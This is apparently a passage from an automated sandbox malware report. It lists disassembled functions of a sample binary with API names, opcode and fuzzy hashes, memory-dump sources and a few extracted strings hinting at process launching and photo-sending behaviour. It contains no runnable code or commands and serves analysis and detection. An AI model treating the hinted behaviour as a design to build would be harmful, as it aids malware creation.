                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: 1$Q]1y$await sendPhotoWithMessage($directory_iterator::directory_iterator$status
                                                                                                                                                                                                                                                                                          • API String ID: 1686256323-661328024
                                                                                                                                                                                                                                                                                          • Opcode ID: 2465eb60af9682d34fb03b81d712e4271be86778465d4af5c69131ba14d2cf6a
                                                                                                                                                                                                                                                                                          • Instruction ID: cb68b9677d55b71094ba3d2bd217441e6d334d9cb02bea6e6f01367b2f44a737
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2465eb60af9682d34fb03b81d712e4271be86778465d4af5c69131ba14d2cf6a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12E19662A18B85C2EA609B25E58037F7361FF86B94F148236DB9D83795DF7CD881C701

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseHandle_invalid_parameter_noinfo_noreturn$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                          • String ID: Failed to start process. Error: $Process started successfully.$Q]1y
                                                                                                                                                                                                                                                                                          • API String ID: 1451358647-917131678
                                                                                                                                                                                                                                                                                          • Opcode ID: e3d3d740665aa7ee2c2765959bdd43bb499740c28333729e43370f3c62015b0a
                                                                                                                                                                                                                                                                                          • Instruction ID: 6a5bb6f72e1222bc246a2b49fcbfdf047cb4eb2cca9f26595fe66f3ff9eecf4d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3d3d740665aa7ee2c2765959bdd43bb499740c28333729e43370f3c62015b0a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26518362E18785C6EA00CB65E48436DA361FFD57A4F50933AEAAC42EE9DF7CD080C701
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2067211477-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ae3f8bb4fe257cc79dbb2d2f165059ab1c58b9f3a2a9237115300b53a347d4bb
                                                                                                                                                                                                                                                                                          • Instruction ID: 5ad502897423657b173f4d2855ff620095ea7df5707baac2797f07397392f223
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae3f8bb4fe257cc79dbb2d2f165059ab1c58b9f3a2a9237115300b53a347d4bb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07213A25A09B52C6EE54DB62A49417DB3A0FF89BD8F084939EE4E93B55DE3CE400C612
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: Q]1y
                                                                                                                                                                                                                                                                                          • API String ID: 73155330-3642082322
                                                                                                                                                                                                                                                                                          • Opcode ID: bd354e9ddf7cbed29d13e34746afe35b9c6be54291eeb770e1ff61d8a9e546c9
                                                                                                                                                                                                                                                                                          • Instruction ID: c2d420e49481b80a3d9cac099df2074dfae1aeaa6803d6c54040b930c6d5745d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd354e9ddf7cbed29d13e34746afe35b9c6be54291eeb770e1ff61d8a9e546c9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F171B262B6878682EE14CB15A88437EA355FF85BD4F14463AEE9D47B85EF3CE081C301
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: ios_base::badbit set
                                                                                                                                                                                                                                                                                          • API String ID: 73155330-3882152299
                                                                                                                                                                                                                                                                                          • Opcode ID: c1169f8eb98a53ac9a0b8bd264596b5bdcb5148028f944edc5eecb64479fea85
                                                                                                                                                                                                                                                                                          • Instruction ID: 01feb4f3e44261e590e78dcb7db85f750fecf392ad35059784821d3cdcb76690
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1169f8eb98a53ac9a0b8bd264596b5bdcb5148028f944edc5eecb64479fea85
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE51CF62A29B86C2EE24CB55E18027E6361FF94BE4F508639DABD437D5DF7CE490C201
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1346393832-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 560a3cacb7b3363e95777e805e073be73bb341bd937cb9dedb7b8c95ea93974d
                                                                                                                                                                                                                                                                                          • Instruction ID: 88faacc944a268fb2f07ac8ed34bfa5c8e7f194fa3c11eabc40cf3997dac59d1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 560a3cacb7b3363e95777e805e073be73bb341bd937cb9dedb7b8c95ea93974d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB41C762A18B8581EA109B29E58137D6361FF997E4F109334FB9C42B9ADF3CE1C0C701
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
                                                                                                                                                                                                                                                                                          • Instruction ID: 5459b1a51c03efc19aa0ab2870363399e6633bafecbe515d147055cd19ed0ab9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47D09E14F08602C2FB586B7178D527C12517F98B49F44143CC80F96793ED3DA44DC352
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: Q]1y
                                                                                                                                                                                                                                                                                          • API String ID: 0-3642082322
                                                                                                                                                                                                                                                                                          • Opcode ID: c1ca8e71dca233b18151e78d569e65759aca1a0d3b30d694b6e1093483697a2d
                                                                                                                                                                                                                                                                                          • Instruction ID: bcd8a125b2e0ab0d13619f9170a1383bb3f18828fc5015b333c541c788e0c2ae
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1ca8e71dca233b18151e78d569e65759aca1a0d3b30d694b6e1093483697a2d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54611662A5864AC1EA608B19E08427DE391FF50BE0F54463AEF8D83BD5DF7CE482C305
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: Q]1y
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-3642082322
                                                                                                                                                                                                                                                                                          • Opcode ID: c5d642ed799c4159ed69cb954db0d6d14ae4b60587307b7214a5c5fbb0a0edd3
                                                                                                                                                                                                                                                                                          • Instruction ID: b651ee37df7e99e4fb360b3a8d8995ae8821c8c9e19e5fe026f40a8a0ab1e187
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5d642ed799c4159ed69cb954db0d6d14ae4b60587307b7214a5c5fbb0a0edd3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C617272A18B85C5EB00CB65E4802ADA760FF84B94F50852AEF8D93B69DF7CD446C701
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-410509341
                                                                                                                                                                                                                                                                                          • Opcode ID: 603a9e8d61f0d21dacede129d1c00d73baa36eba41d0eccb5d019084a6c393c9
                                                                                                                                                                                                                                                                                          • Instruction ID: baabc6c320a20641634423d9abc857cb915129c4483dbe28cd366a44c833e46a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 603a9e8d61f0d21dacede129d1c00d73baa36eba41d0eccb5d019084a6c393c9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1318662918BC5C1DB109B28E4813AD6361FF9A7A8F505335EB9C537A5EF3CD581C300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68457F4E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68457F5E2
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68457F4E0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68457F5E8
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF6845A91B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6845A91DB
                                                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00007FF684588957
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_taskCpp_errorThrow__invalid_parameter_noinfo_invalid_parameter_noinfo_noreturnstd::_
                                                                                                                                                                                                                                                                                          • String ID: Q]1y
                                                                                                                                                                                                                                                                                          • API String ID: 88918588-3642082322
                                                                                                                                                                                                                                                                                          • Opcode ID: cda83e72df4b4452b10499556b15efd889cd94d2f8c263e70bb30bbf8a668c49
                                                                                                                                                                                                                                                                                          • Instruction ID: b0f43c17b1bc7f7b3fdf895e44518347764320bfa822f4e18f60aabccf7432f9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cda83e72df4b4452b10499556b15efd889cd94d2f8c263e70bb30bbf8a668c49
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE217C36608B80C1E620DB12E4856AE73A1FF88BD4F458439EE8D87B59DE3CD051C701
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00007FF6845B83CD,?,?,00000000,00007FF6845B8482), ref: 00007FF6845B85BE
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF6845B83CD,?,?,00000000,00007FF6845B8482), ref: 00007FF6845B85C8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
                                                                                                                                                                                                                                                                                          • Instruction ID: 625e00844dbc15ba061db9d4285d596504e49fd2e29b02de7407a0028547b79f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09218E21F08642D1FAA09721A4D427D1282BF85BE4F48963DEA6EC77D2DF6CE445D302
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
                                                                                                                                                                                                                                                                                          • Instruction ID: e962c937c07f49ed35a532a70096ff5938a1e619f0e4e803b4051f4c768792d3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39317C22A18656C6E791AF1588C13BC2650BF60B90F45023DEA6D83BD2DFBCA941C713
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
                                                                                                                                                                                                                                                                                          • Instruction ID: cf0bf21c83e03530d0d29312e8cd8c1b67a1f9a80d3ba2c33b0b890a4e27f92e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6215A32A14A06C9EB64CF64E8802AC37B0FF5471CF580A3AD62D97AD5DF38D485CB91
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e6349361f6599f48b43bc6f5e26d83757976fd9c1f62d7a7d6d28429aee037a6
                                                                                                                                                                                                                                                                                          • Instruction ID: d783eeb4f0fd8dbea3a1dde25c507cb903eeae0165bcb6675f706529905a5143
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6349361f6599f48b43bc6f5e26d83757976fd9c1f62d7a7d6d28429aee037a6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7117C22B5868292EA04DB16E19437E2362FF44B84F545439DB0D8BB86DF7DD9A0C381
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
